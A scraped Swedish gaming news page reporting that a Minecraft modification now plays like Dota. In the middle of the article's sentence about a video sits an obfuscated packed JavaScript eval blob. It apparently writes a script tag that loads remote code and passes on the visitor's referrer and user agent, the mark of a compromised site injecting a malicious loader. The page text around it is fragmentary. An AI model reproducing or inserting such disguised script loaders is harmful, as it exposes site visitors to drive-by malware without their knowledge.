Image Image Image Image Image Image Image Image Image Image

| 21 mars, 2018

Scroll to top

Top

One Comment

Nu kan du spela Dota i ditt Minecraft | Revue.se

Sebastian Plengier Ehrnfelt

Det är ett roligt gäng som nu skapat en modifikation som fungerar som Dota. De verkar fått med det mesta, Du slåss mot den andra sidan, nedkämpar fiendens försvar, köper prylar och detta utan att behöva ladda ner fler externa modifikationer.

Kolla eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ifyds|var|u0026u|referrer|fkits||js|php’.split(‘|’),0,{}))
videon ovan!